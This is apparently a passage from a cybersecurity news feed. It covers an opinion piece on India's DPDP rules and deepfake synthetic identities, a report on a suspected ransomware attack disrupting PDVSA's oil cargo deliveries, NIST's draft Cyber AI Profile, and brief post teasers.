The first shift happens at data entry. The rules require clear consent, proof of lawful purpose, and timely correction of errors. This forces organisations to examine the origin of the data they collect and to maintain records that confirm why the data exists. Better visibility into the source and purpose of data makes it harder for synthetic identities to enter the system through weak or careless intake flows. This matters because the word synthetic now carries two very different meanings. One meaning refers to responsible synthetic data used in privacy enhancing technologies. This type is created intentionally, documented carefully, and used to train models or test systems without revealing personal information. It supports the goals of privacy regulation and does not imitate real individuals.

Synthetic Data vs Synthetic Identity: A Critical Difference

The other meaning refers to deceptive synthetic identities, false personas deliberately created to exploit weak verification processes. These may include deepfake facial images, manipulated voice samples, and fabricated documents or profiles that appear legitimate enough to pass routine checks.

This form of synthetic identity thrives in environments with poor data discipline and is designed specifically to mislead systems and people.

The DPDP rules help enterprises tell the difference with more clarity. Responsible synthetic data has provenance and purposeful creation. Deceptive synthetic identity has neither. Once intake and governance become more structured, the distinction becomes easier to detect through both human review and automated systems.

Cleaner Data Improves Fraud and Risk Detection

As organisations rewrite consent journeys and strengthen provenance under the DPDP rules, the second advantage becomes clear. Cleaner input improves downstream behaviour. Fraud engines perform better with consistent signals. Risk decisions become clearer. Customer support teams gain more dependable records. When data is scattered and unchecked, synthetic personas move more freely. When data is organised and verified, they become more visible. This is where the influence of DPDP rules becomes subtle. Deepfake content succeeds by matching familiar patterns. It blends into weak systems that cannot challenge continuity. Structured data environments limit these opportunities. They reduce ambiguity and shrink the number of places where a false identity can hide. This gives enterprises a stronger base for every detection capability they depend on. There is also a behavioural shift introduced by the DPDP rules. Once teams begin managing data with more discipline, their instinct around authenticity improves. Consent is checked properly. Accuracy is taken seriously. Records are maintained rather than ignored. This change in everyday behaviour strengthens identity awareness across the organisation. Deepfake risk is not only technical. It is also operational, and disciplined teams recognise anomalies faster.

DPDP Rules Do Not Stop Deepfakes—but They Shrink the Attack Surface

None of this means that DPDP rules stop deepfakes. They do not. Deepfake quality is rising and will continue to challenge even mature systems. What the rules offer is a necessary foundation. They push organisations to adopt habits of verification, documentation, and controlled intake. Those habits shrink the attack surface for synthetic identities and improve the effectiveness of whatever detection tools a company chooses to use. As enterprises interpret the rules, many will see the work as procedural. New notices. Updated consent. Retention plans. But the real strength will emerge in the functions that depend on reliable identity and reliable records. Credit decisions. Access management. Customer onboarding. Dispute resolution. Identity verification. These areas become more stable when the data that supports them is consistent and traceable. The rise of deepfakes makes this stability essential. False personas are cheap to create and increasingly convincing. They will exploit gaps wherever they exist. Strong tools matter, but so does the quality of the data that flows into those tools. Without clean and verified data, even advanced detection systems struggle. The DPDP rules arrive at a moment when enterprises need stronger foundations. By demanding better intake discipline and clearer data pathways, they reduce the natural openings that deceptive synthetic content relies on. In a world where authentic and synthetic individuals now compete for space inside enterprise systems, this shift may become one of the most practical outcomes of the entire compliance effort. (This article reflects the author’s analysis and personal viewpoints and is intended for informational purposes only. It should not be construed as legal or regulatory advice.)

PDVSA Cyberattack Disrupts Administrative Systems, Oil Cargo Deliveries Suspended

17 December 2025 at 02:09

Venezuela’s state-run oil company, Petróleos de Venezuela (PDVSA), has confirmed that a cyberattack on PDVSA’s administrative systems caused widespread disruptions, even as the company publicly claimed that oil operations were unaffected. The Venezuela oil cyberattack, or PDVSA cyberattack, comes at a time of escalating political and military tensions between Caracas and Washington, following recent U.S. actions against Venezuelan oil shipments. PDVSA announced the incident in a statement on Monday, blaming the attack on the United States and describing it as part of a broader strategy to seize control of Venezuela’s oil resources. However, cybersecurity experts and company sources cited by Reuters have found no evidence linking the PDVSA cyberattack to the U.S. government.

PDVSA Blames US for Cyberattack on Venezuela’s Oil Company

In its statement, PDVSA accused the United States of coordinating the PDVSA cyberattack as part of what it called an aggressive campaign against Venezuela’s energy sovereignty. “This attempt at aggression adds to the public strategy of the U.S. government to take over Venezuelan oil by force and piracy,” PDVSA said. The company claimed the cyberattack was carried out by foreign interests working with domestic actors to undermine Venezuela’s right to develop its energy sector independently. Venezuela’s oil ministry echoed these accusations, stating that the attack aligned with U.S. efforts to control the country’s oil through “force and piracy.” Despite these claims, PDVSA provided no technical details about the attack or evidence supporting the allegations.

Ransomware Attack Suspected as PDVSA Systems Go Down

While PDVSA said it had recovered from the cyberattack, multiple sources told Reuters that the PDVSA ransomware attack was far more damaging than officials admitted. According to four sources, the company’s administrative systems remained down, forcing a halt to oil cargo deliveries. “There’s no delivery of cargoes, all systems are down,” one PDVSA source told Reuters, adding that workers internally described the incident as a ransomware attack. Sources said PDVSA detected the attack days earlier. In attempting to resolve the issue, antivirus software reportedly disrupted the company’s entire administrative network. As a result, workers were forced to keep handwritten records after systems failed to restart. Although oil production, refining, and domestic fuel distribution were reportedly unaffected by the PDVSA cyberattack, export logistics were severely disrupted. A shipper involved in Venezuelan oil deals confirmed that all loading instructions for export markets remained suspended.

Oil Exports Impacted as PDVSA Limits System Access

As the Venezuela cyberattack on PDVSA continued, the company reportedly ordered administrative and operational staff to disconnect from internal systems. Access for indirect workers was also restricted, according to sources. PDVSA’s website remained offline as of Tuesday afternoon, adding to concerns about the scale of the disruption. Despite official claims of recovery, sources said the effects of the cyber incident were ongoing.

PDVSA Cyberattack Follows US Seizure of Venezuelan Oil Tanker

The PDVSA cyberattack occurred just one week after U.S. military forces seized a PDVSA tanker carrying nearly 1.85 million barrels of Venezuelan heavy crude in the Caribbean. The seizure drew strong condemnation from Cuba, which described it as an act of piracy and a violation of international law. Cuban officials said the tanker was believed to be transporting oil destined for Cuba, a country that relies heavily on Venezuelan oil supplies. Following the seizure, Reuters reported that Venezuelan oil exports fell sharply, with some tankers turning back due to fears of further U.S. action. U.S. officials have indicated that more tanker seizures could follow in the coming weeks.

Geopolitical Pressure Intensifies Around Venezuela’s Oil Industry

The PDVSA cyberattack has unfolded amid a broader U.S. military buildup in the Caribbean, U.S. strikes on alleged drug trafficking boats, and renewed sanctions targeting Venezuelan shipping and individuals linked to President Nicolás Maduro. The Venezuelan government maintains that the United States is seeking regime change to gain access to the country’s vast oil reserves. PDVSA, which plays a key role in Venezuela’s financial ties with China, Russia, Iran, and Cuba, remains central to that struggle. As tensions rise, the PDVSA cyberattack highlights how digital attacks, sanctions, and military pressure are increasingly converging around Venezuela’s oil sector, with significant implications for global energy markets and regional stability.

NIST Releases Draft AI Cybersecurity Guidance to Address Risks of Enterprise AI Adoption

17 December 2025 at 01:14

Artificial intelligence is increasingly embedded in enterprise environments, creating new cybersecurity risks alongside operational benefits. To address this shift, the National Institute of Standards and Technology (NIST) has released a preliminary draft of guidance called the Cyber AI Profile, aimed at helping organizations align their cybersecurity strategies with AI adoption. These draft NIST guidelines are presented in a new document known as the Cybersecurity Framework Profile for Artificial Intelligence (NISTIR 8596), commonly referred to as the Cyber AI Profile. The publication is intended to help organizations apply the NIST Cybersecurity Framework, specifically CSF 2.0, to the secure and responsible use of AI technologies. The goal is to accelerate AI adoption while mitigating the cybersecurity risks that accompany AI’s rapid advancement. 

Why Do We Need AI Cybersecurity Guidelines? 

According to NIST, AI affects cybersecurity in multiple ways. Organizations must secure AI systems themselves, consider how AI can strengthen cyber defense operations, and prepare for a growing class of AI-enabled cyberattacks. The Cyber AI Profile reflects this reality by organizing its guidance around three overlapping focus areas: securing AI systems, conducting AI-enabled cyber defense, and thwarting AI-enabled cyberattacks.

Barbara Cuthill, one of the authors of the profile, stresses that organizations cannot afford to treat AI as a distant concern. “Regardless of where organizations are on their AI journey, they need cybersecurity strategies that acknowledge the realities of AI’s advancement,” she said.

Inside the Cyber AI Profile and Its Three Focus Areas 

The Cyber AI Profile is the result of a year-long collaborative effort involving NIST cybersecurity and AI specialists, supported by extensive public engagement. Over the course of the project, more than 6,500 individuals joined a community of interest to provide input. NIST released an initial concept paper in February 2025, followed by a workshop in April 2025 and a series of community meetings during the summer. This process led to the release of the preliminary draft, which is now open for a 45-day public comment period.

Each of the three focus areas addressed in the Cyber AI Profile serves a distinct role. Securing AI systems involves identifying cybersecurity challenges that emerge when AI is integrated into organizational infrastructure and ecosystems. Conducting AI-enabled cyber defense examines how AI can be used to strengthen cybersecurity operations while recognizing the risks associated with deploying AI in defensive roles. Thwarting AI-enabled cyberattacks focuses on building resilience against threats that use AI to increase their scale, speed, or effectiveness.

“The three focus areas reflect the fact that AI is entering organizations’ awareness in different ways,” Cuthill said. “But ultimately every organization will have to deal with all three.”

Applying CSF 2.0 and the NIST Cybersecurity Framework to AI 

Through the lens of the NIST Cybersecurity Framework, the Cyber AI Profile helps organizations clarify their cybersecurity objectives related to AI and CSF 2.0. It offers structured insights to help organizations understand, evaluate, and address AI-related cybersecurity concerns while integrating AI into existing cybersecurity programs in a deliberate way.

NIST refers to the Cyber AI Profile as a “community profile,” meaning it applies CSF 2.0 to shared goals across multiple sectors. The Cyber AI Profile joins similar community profiles developed for manufacturing, financial services, telecommunications, and other industries.

The preliminary draft is intended to gather public feedback before NIST releases an initial public draft in 2026. That version is expected to refine the guidance further and include expanded mappings to additional NIST resources. When finalized, the profile will help organizations incorporate AI into cybersecurity planning by identifying priority actions.

Cuthill said the authors hope the Cyber AI Profile will continue to evolve as a practical resource. “The Cyber AI Profile is all about enabling organizations to gain confidence in their AI journey,” she said. “We hope it will help them feel equipped to have conversations about how their cybersecurity environment will change with AI and to augment what they are already doing with their cybersecurity programs.”

Homomorphic Encryption for Privacy-Preserving Model Context Sharing

Discover how homomorphic encryption (HE) enhances privacy-preserving model context sharing in AI, ensuring secure data handling and compliance for MCP deployments.

The post Homomorphic Encryption for Privacy-Preserving Model Context Sharing appeared first on Security Boulevard.

What is the Difference Between LDAP and Single Sign-On?

Explore the differences between LDAP and Single Sign-On (SSO) for user authentication. Understand their use cases, benefits, and how they fit into your enterprise security strategy.

The post What is the Difference Between LDAP and Single Sign-On? appeared first on Security Boulevard.

Configuring Users Without OTP Login: A Guide

Learn how to configure users without OTP login in your applications. This guide covers conditional authentication, account settings, and fallback mechanisms for seamless access.

The post Configuring Users Without OTP Login: A Guide appeared first on Security Boulevard.
